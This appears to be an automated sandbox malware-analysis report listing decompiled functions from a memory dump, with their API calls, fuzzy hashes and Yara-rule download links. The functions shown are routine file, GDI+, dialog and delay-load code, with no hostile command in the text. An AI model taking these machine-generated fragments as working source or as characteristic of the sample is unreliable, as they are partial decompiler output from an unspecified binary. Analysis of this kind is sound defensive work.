Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 6fdd172746ac8ebc648f5bd6b11e78a725175d8545cac39f2a97ec2309ca8246
Instruction ID: cff84a08646ca7d2de8cc38d5d09d92ed322c51a7f9fbaf5298b5d41a812f350
Opcode Fuzzy Hash: 6fdd172746ac8ebc648f5bd6b11e78a725175d8545cac39f2a97ec2309ca8246
Instruction Fuzzy Hash: 9DF05E70442B045EEF318A288549B97B7E89B16735F048B5FE0EA439E09375A88D8B10

Uniqueness

Uniqueness Score: -1.00%

Function 0019A1B1, Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0019A1B1(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void* _t12;
				intOrPtr _t20;

				_t20 = _a8;
				 *((char*)(_t20 + 0x1044)) = 0;
				if(E0019B5E5(_a4) == 0) {
					_t12 = E0019A2DF(__edx, 0xffffffff, _a4, _t20);
					if(_t12 == 0xffffffff) {
						goto L1;
					}
					FindClose(_t12); // executed
					 *(_t20 + 0x1040) =  *(_t20 + 0x1040) & 0x00000000;
					 *((char*)(_t20 + 0x100c)) = E00199ECD( *((intOrPtr*)(_t20 + 0x1008)));
					 *((char*)(_t20 + 0x100d)) = E00199EE5( *((intOrPtr*)(_t20 + 0x1008)));
					return 1;
				}
				L1:
				return 0;
			}

0x0019a1b2
0x0019a1ba
0x0019a1c8
0x0019a1d5
0x0019a1dd
0x00000000
0x00000000
0x0019a1e0
0x0019a1ec
0x0019a1fe
0x0019a209
0x00000000
0x0019a20f
0x0019a1ca
0x00000000

APIs

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0019A1E0

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: b26edf037bf67fd8d81b51fafca0d04f7ebec3e633cdc2de6523a47ce2f8e8da
Instruction ID: 37f4955d0f84fa702a657aa2db80c6cec29cb4c3b94304b81ed6dfb691c2b79b
Opcode Fuzzy Hash: b26edf037bf67fd8d81b51fafca0d04f7ebec3e633cdc2de6523a47ce2f8e8da
Instruction Fuzzy Hash: 5EF08235408780ABCE225BB84804BD7BBA16F26331F148A4DF1FD12192C7766099D762

Uniqueness

Uniqueness Score: -1.00%

Function 001A02E8, Relevance: 1.5, APIs: 1, Instructions: 21
threadCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E001A02E8() {
				void* __esi;
				void* _t2;

				E001A0FAF(); // executed
				_t2 = E001A0FB4();
				if(_t2 != 0) {
					_t2 = E00196CC9(_t2, 0x1d00e0, 0xff, 0xff);
				}
				if( *0x1d00eb != 0) {
					_t2 = E00196CC9(_t2, 0x1d00e0, 0xff, 0xff);
				}
				__imp__SetThreadExecutionState(1);
				return _t2;
			}

0x001a02ea
0x001a02ef
0x001a0300
0x001a0305
0x001a0305
0x001a0311
0x001a0316
0x001a0316
0x001a031d
0x001a0325

APIs

SetThreadExecutionState.KERNEL32 ref: 001A031D

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: 3d476ee6ea029ed1b1095ec87ff30c8adb49113c58d641cfbfca63bb8c88f339
Instruction ID: cba1b2d3111f23a80d312a215c3a4b4e3fa44b04af91c9be77ecb62a00d588af
Opcode Fuzzy Hash: 3d476ee6ea029ed1b1095ec87ff30c8adb49113c58d641cfbfca63bb8c88f339
Instruction Fuzzy Hash: 7CD02B14B021502BDF23732429057FE06065FDF360F08002BF049363C78B590CCA83B1

Uniqueness

Uniqueness Score: -1.00%

Function 001A95CF, Relevance: 1.5, APIs: 1, Instructions: 17
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E001A95CF(signed int __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t6;

				_push(__ecx);
				_push(0x10);
				L001AD7F6();
				_v8 = __eax;
				if(__eax == 0) {
					return 0;
				}
				_t6 = E001A938E(__eax, _a4, _a8); // executed
				return _t6;
			}

0x001a95d2
0x001a95d3
0x001a95d5
0x001a95da
0x001a95df
0x00000000
0x001a95f0
0x001a95e9
0x00000000

APIs

GdipAlloc.GDIPLUS(00000010), ref: 001A95D5

Part of subcall function 001A938E: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 001A93AF

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: c2a80f1359858ca97af3cccb572868f2337aa7eea0f8eb62410b7628bddc2cae
Instruction ID: d1510ff569ff4ed2b439f71048f7bec12781427a40a1012459debf6c138f0cab
Opcode Fuzzy Hash: c2a80f1359858ca97af3cccb572868f2337aa7eea0f8eb62410b7628bddc2cae
Instruction Fuzzy Hash: BAD0A73860410D7BDF56BA749C03E7E7A98EF12310F008066BC05C5141FF71DD50A291

Uniqueness

Uniqueness Score: -1.00%

Function 00199745, Relevance: 1.5, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00199745(void* __ecx) {
				long _t3;

				if( *(__ecx + 4) != 0xffffffff) {
					_t3 = GetFileType( *(__ecx + 4)); // executed
					if(_t3 == 2 || _t3 == 3) {
						return 1;
					} else {
						return 0;
					}
				} else {
					return 0;
				}
			}

0x00199749
0x00199751
0x0019975a
0x00199767
0x00199761
0x00199763
0x00199763
0x0019974b
0x0019974d
0x0019974d

APIs

GetFileType.KERNELBASE(000000FF,00199683), ref: 00199751

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 803daeab26645a76606b5a9e0bfa7de39f94f31c3e03e96ab7a570005a34b9b8
Instruction ID: 9976ba9d03f0381a5e650fa72c6a71892fcc78f00280ff0d64ba031a14544843
Opcode Fuzzy Hash: 803daeab26645a76606b5a9e0bfa7de39f94f31c3e03e96ab7a570005a34b9b8
Instruction Fuzzy Hash: CDD01230131300968F291E7C4E090567B569F43766738C6A8E025C40B1CB32C843F941

Uniqueness

Uniqueness Score: -1.00%

Function 001AC9FE, Relevance: 1.5, APIs: 1, Instructions: 13
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E001AC9FE(intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				void* _t7;

				SendDlgItemMessageW( *0x1d75c8, 0x6a, 0x402, E0019F749(_a20, _a24, _a28, _a32), 0); // executed
				_t7 = E001AA388(); // executed
				return _t7;
			}

0x001aca23
0x001aca29
0x001aca2e

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 001ACA23

Part of subcall function 001AA388: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 001AA399
Part of subcall function 001AA388: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001AA3AA
Part of subcall function 001AA388: IsDialogMessageW.USER32(0019004A,?), ref: 001AA3BE
Part of subcall function 001AA388: TranslateMessage.USER32(?), ref: 001AA3CC
Part of subcall function 001AA388: DispatchMessageW.USER32(?), ref: 001AA3D6

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: aa214c63b978f8c2c7c4416810a9e63ffb9b004ca62f9c99fbf7f1917e8e9859
Instruction ID: fdadb8bcfcd8c14add89f88402e82ba55b83b80a34fd1c00abcfeee9298569a3
Opcode Fuzzy Hash: aa214c63b978f8c2c7c4416810a9e63ffb9b004ca62f9c99fbf7f1917e8e9859
Instruction Fuzzy Hash: 51D09E35145300BADB022B51DE06F1A7BB2BF9CF04F404558B245740F187629D619B12

Uniqueness

Uniqueness Score: -1.00%

Function 001AD1BF, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E001AD1BF() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E001AD53A(_t3, _t4, _t8, _t9, _t10, 0x1cab6c, 0x1cdf10); // executed
				goto __eax;
			}

0x001ad1ae
0x001ad1b6
0x001ad1bd

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001AD1B6

Part of subcall function 001AD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001AD5B7
Part of subcall function 001AD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001AD5C8

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 22a7b4a80602c29099b73527435ba6043c5d75c1320227eccdc9cbd2e867e901
Instruction ID: f8031f64ad2b08f98b099cdbadf642763a680cc7a7c203bc7485342a98cd77c6
Opcode Fuzzy Hash: 22a7b4a80602c29099b73527435ba6043c5d75c1320227eccdc9cbd2e867e901
Instruction Fuzzy Hash: 99B0128D758400AC310D61547D02F36025CE4E3B18770842EF007C0488DB40DD011033

Uniqueness

Uniqueness Score: -1.00%

Function 001AD1A4, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E001AD1A4() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E001AD53A(_t3, _t4, _t8, _t9, _t10, 0x1cab6c, 0x1cdf08); // executed
				goto __eax;
			}

0x001ad1ae
0x001ad1b6
0x001ad1bd

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001AD1B6

Part of subcall function 001AD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001AD5B7
Part of subcall function 001AD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001AD5C8

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1e91e4bdd96f812f3e3ade034de46815181dd6a77279073256b757f74a0916b8
Instruction ID: 69352ef582a68737674d7b97619e029fad43341c2d0e3e0ea8d265ba987c480d
Opcode Fuzzy Hash: 1e91e4bdd96f812f3e3ade034de46815181dd6a77279073256b757f74a0916b8
Instruction Fuzzy Hash: C4B0128D798508BC310D3100FE02E36021DD5E2B18771812EF003D0480DF40ED410033

Uniqueness

Uniqueness Score: -1.00%

Function 001AD1DD, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E001AD1DD() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E001AD53A(_t3, _t4, _t8, _t9, _t10, 0x1cab6c, 0x1cdf04); // executed
				goto __eax;
			}

0x001ad1ae
0x001ad1b6
0x001ad1bd

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001AD1B6

Part of subcall function 001AD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001AD5B7
Part of subcall function 001AD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001AD5C8

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1b42dc28853c382ba8df6935be30b3f7a0d63f665e66ddbb369e8653bc1e0986
Instruction ID: 05017204dc0fa854d7dbaaa4beb4a314dca5d4854da1416ed69bebdf43aa26a1
Opcode Fuzzy Hash: 1b42dc28853c382ba8df6935be30b3f7a0d63f665e66ddbb369e8653bc1e0986
Instruction Fuzzy Hash: E1B0128D758400AC310D61047E02F36025CD4E2B18770802EF007C1440DB41ED020033

Uniqueness

Uniqueness Score: -1.00%

Function 001AD1C9, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E001AD1C9() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E001AD53A(_t3, _t4, _t8, _t9, _t10, 0x1cab6c, 0x1cdf0c); // executed
				goto __eax;
			}

0x001ad1ae
0x001ad1b6
0x001ad1bd

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001AD1B6

Part of subcall function 001AD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001AD5B7
Part of subcall function 001AD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001AD5C8

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f603e8f825d2d206a64b0b49722be3db7eac10588527f24208a2914d51c5efe5
Instruction ID: 9b85ed86515359507018a8df8cb9b49f40c2ca898eb2e8357477f9f0c769165b
Opcode Fuzzy Hash: f603e8f825d2d206a64b0b49722be3db7eac10588527f24208a2914d51c5efe5
Instruction Fuzzy Hash: 07B0128D758400AC310D61047D12F36036CD4E2B18770C02EF407C1440DB40ED010133

Uniqueness

Uniqueness Score: -1.00%

Function 001AD205, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E001AD205() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E001AD53A(_t3, _t4, _t8, _t9, _t10, 0x1cab8c, 0x1cdff8); // executed
				goto __eax;
			}

0x001ad20f
0x001ad217
0x001ad21e

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001AD217

Part of subcall function 001AD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001AD5B7
Part of subcall function 001AD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001AD5C8

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5b702acc4f55a2d2ad7542cf543f1e16e0ce4ca28ed5a8abbc1e5c3f5e66f34e
Instruction ID: 02d89a5ecabb558b706dbb30c99651bc44c36fdaba7ee2a5bf22eb16310ba773
Opcode Fuzzy Hash: 5b702acc4f55a2d2ad7542cf543f1e16e0ce4ca28ed5a8abbc1e5c3f5e66f34e
Instruction Fuzzy Hash: 53B012CD298504BC310951447D02F3A131DE5F2F3C330816FF013D0484DB40DD410032

Uniqueness

Uniqueness Score: -1.00%

Function 001AD23E, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E001AD23E() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E001AD53A(_t3, _t4, _t8, _t9, _t10, 0x1cab8c, 0x1cdff0); // executed
				goto __eax;
			}

0x001ad20f
0x001ad217
0x001ad21e

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001AD217

Part of subcall function 001AD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001AD5B7
Part of subcall function 001AD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001AD5C8

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a42ad6d7ff71f163ce500babe8bf21baf3778cfe8212a77c62040ac35733b41a
Instruction ID: 5deb6a2db9043e11ec3e58ed033756db4c25c93b4c0714963c64f4d292dbdd2d
Opcode Fuzzy Hash: a42ad6d7ff71f163ce500babe8bf21baf3778cfe8212a77c62040ac35733b41a
Instruction Fuzzy Hash: 2DB012DD298400AC310991487D02F3A035DF4F2B3C330806FF007C1444DB40DD010032

Uniqueness

Uniqueness Score: -1.00%

Function 001AD234, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E001AD234() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E001AD53A(_t3, _t4, _t8, _t9, _t10, 0x1cab8c, 0x1cdffc); // executed
				goto __eax;
			}

0x001ad20f
0x001ad217
0x001ad21e

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001AD217

Part of subcall function 001AD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001AD5B7
Part of subcall function 001AD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001AD5C8

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1d7b93b9f39fef55c8d1c30af49a468aad20e12b95b8a814cf0359a2034f1006
Instruction ID: cff50927e2cb3fed30f7c16516280b2d9924ba7aaf8b3061291f9a2d671e4a9f
Opcode Fuzzy Hash: 1d7b93b9f39fef55c8d1c30af49a468aad20e12b95b8a814cf0359a2034f1006
Instruction Fuzzy Hash: F6B012CD298400AC310991487D12F3A035DE4F2B3C330C06FF407C1840DB40DD010032

Uniqueness

Uniqueness Score: -1.00%

Function 001AD7DA, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E001AD7DA() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E001AD53A(_t3, _t4, _t8, _t9, _t10, 0x1cabcc, 0x1cdeb4); // executed
				goto __eax;
			}

0x001ad7e4
0x001ad7ec
0x001ad7f3

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001AD7EC

Part of subcall function 001AD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001AD5B7
Part of subcall function 001AD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001AD5C8

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2dae7965357db39d73c8d1089937e15b4173d90e924fdc138782c3256ecf4e46
Instruction ID: 70c1fb0b947b78836b490dcf365a5119f2a5d9ddeacf3f8150debfd86d1398f5
Opcode Fuzzy Hash: 2dae7965357db39d73c8d1089937e15b4173d90e924fdc138782c3256ecf4e46
Instruction Fuzzy Hash: 47B012D9258801FD310D62447F02E36131CC4F2B1C330802FF002D48409F41ED010032

Uniqueness

Uniqueness Score: -1.00%

Function 001AD1D8, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E001AD1D8() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x1cab6c); // executed
				E001AD53A(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x001ad1b1
0x001ad1b6
0x001ad1bd

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001AD1B6

Part of subcall function 001AD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001AD5B7
Part of subcall function 001AD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001AD5C8

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4c55a37e67e17735321ed805c2a032d617fca8769ad2d5ef2409442a3d5e116b
Instruction ID: d52369c57b1e040c7f5ea6ff4e47a0a392b467c3ce9f3f733923b4469a40393d
Opcode Fuzzy Hash: 4c55a37e67e17735321ed805c2a032d617fca8769ad2d5ef2409442a3d5e116b
Instruction Fuzzy Hash: 22A0118EAA8802BC300E2200BC02E3A022CC8E2B28BB0880EF00380880AA80AE000032

Uniqueness

Uniqueness Score: -1.00%

Function 001AD1F6, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E001AD1F6() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x1cab6c); // executed
				E001AD53A(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x001ad1b1
0x001ad1b6
0x001ad1bd

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001AD1B6

Part of subcall function 001AD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001AD5B7
Part of subcall function 001AD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001AD5C8

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8bece1b0922af4ae4e2dd42c2b5b441a6e28fdb0a5572d449c2642eee4b2878e
